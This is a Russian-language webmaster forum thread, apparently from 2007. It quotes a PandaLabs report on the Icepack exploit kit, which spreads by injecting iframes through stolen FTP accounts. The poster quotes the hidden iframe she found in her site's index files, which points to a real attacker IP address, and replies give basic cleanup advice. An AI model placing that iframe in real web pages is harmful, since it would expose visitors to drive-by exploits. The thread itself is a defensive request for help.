SOS Virus на сайте!!! Важно! Всем!

Sterva
На сайте с 11.03.2007
Offline
14
1254

Недавно получила спам такого содержания:

PandaLabs: вирус продается за 400$

Появление этой утилиты свидетельствует о существовании в интернете определенной бизнес-модели, основанной на разработке и продаже подобных видов вредоносных приложений.

В отличие от ранее обнаруженных подобных приложений, таких как Mpack, эта утилита самостоятельно выполняет заражение и распространяется без вмешательство хакера.

PandaLabs обнаружила новую опасную утилиту, устанавливающую вредоносное ПО с помощью эксплойтов. Эта утилита носит название Icepack и продается в интернете за 400 долларов США. Она дополняет ряд других утилит, обнаруженных PandaLabs в последнее время, таких как Mpack, XRummer, Zunker, Barracuda, Pinch и др., подтверждая успешность и выгодность бизнеса, который развивается в интернете за счет создания и продажи вредоносных приложений.

Icepack заражает компьютеры следующим образом: утилита получает доступ к определенной веб-странице, куда оно добавляет iframe-ссылку, ведущую на сервер, на котором установлено данное приложение. Основное отличие Icepack заключается в том, что такую ссылку добавляет сама утилита. Предыдущим приложениям, таким как Mpack, были необходимы действия хакера, который вручную осуществлял доступ к веб-страницам, на которые затем добавлялась ссылка.

При посещении таких искаженных страниц пользователями, активируется Icepack, которая анализирует компьютер пользователя на предмет уязвимостей. При положительном результате, она скачивает из сети эксплойт, необходимый для использования имеющейся в компьютере уязвимости. Еще один отличительный признак Icepack - это то, что она использует эксплойты, соответствующие самым последним выявленным уязвимостям. Этому есть разумное объяснение – в таком случае существует меньшая вероятность того, что пользователи уже обновили свои компьютеры для исправления новейших брешей безопасности.

После этого кибер-преступники могут загружать на зараженные компьютеры любое вредоносное ПО. Если учесть стоимость утилиты, скорее всего она будет загружать вредоносные коды, наиболее часто использующиеся для кражи конфиденциальных данных и позволяющие заниматься онлайновым мошенничеством (трояны, шпионское ПО, боты и др.).

"Данная утилита очень похожа на другие наборы для инсталляции вредоносного ПО с помощью эксплойтов, такие как Mpack, но по сравнению с Mpack создатели дополнили Icepack новыми разработками. Такая эволюция вполне логична, поскольку эти приложения приносят значительное количество прибыли, и естественно, что преступники стремятся заоевать рынок, предлагая более мощные продукты", - объясняет Луис Корронс, технический директор PandaLabs.

Другое нововведение в Icepack – это то, что она сочетает в себе программу проверки ftp и iframe. Первая помогает кибер-преступникам пользоваться информацией об учетных записях FTP, украденных с зараженных компьютеров. Данные этих учетных записей проходят через специальную программу проверки, чтобы удостовериться в их подлинности. Утилита добавляет в учетную запись iframe-ссылку, ведущую к Icepack. Повторением этого процесса приложение начинает свой “жизненный цикл” заново.

Все пользователи, желающие узнать, не были ли их компьютеры заражены этими или другими вредоносными программами, могут воспользоваться бесплатными онлайновыми решениями TotalScan или NanoScan beta, которые можно найти по адресу (тра-ля-ля...)

----------------------------------------------------------------------------------------

В этот же день раньше на одном из серверов нашла в index.html и index.php такую бяку

<iframe src='http://81.95.149.74/22/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

<iframe src='http://81.95.149.74/22/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

причем код сильно изуродован хотя и работает .....

Посоветуйте что-нить? Заменила все зараженные файлы на копии. Как защитить сервак от заразы? помогите! :confused:

Хочется поставить минус? Закрой глаза, досчитай до 10-ти ...если твоя злость не прошла, повтори операцию еще раз.Спасибо. :)
iexpert
На сайте с 01.09.2005
Offline
184
#1
Sterva:
Все пользователи, желающие узнать, не были ли их компьютеры заражены этими или другими вредоносными программами, могут воспользоваться бесплатными онлайновыми решениями TotalScan или NanoScan beta, которые можно найти по адресу (тра-ля-ля...)

для начала пойти на это самое тра ля ля, и скачать эти утилиты, да посмотреть.

P.S. Кстати, не вижу необходимости удаления таких ссылок из сообщения.

P.P.S идти стоит только если ссылка именно на пандалабс ведет, в противном случае тра ля ля уместно.

Что то я заработался по моему.

Бойтесь ваших желаний, ибо они могут исполниться
FL
На сайте с 17.06.2007
Offline
7
#2

Та же фигня - советую всем проверить свои индексные файлы.

Советы ТС:

1. стереть строку

2. поменять пароль фтп-аккаунта

3. просканировать комп на вирусы

ЗЫ. Проверил этот адрес - там у него уже куча беков

Кстати если открыть через браузер - там смайл

Seo Spy
На сайте с 31.07.2007
Offline
10
#3

Уже не актуальная тема. Весной от этой заразы даже рбк пострадал. Ставте каспера и не держите открытых фтп соединений. При серфинге в интернете отключайте java - особенно на компьютерах с которых выполняется подключение к сайтам... Да и не используйте IE))

get rich or die tryin - (c) У Анатолия Вассермана 7 мозгов, один в голове, 5 рассованы по карманам и один в бороде. (http://portal.legko.org/2007/10/26/)

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий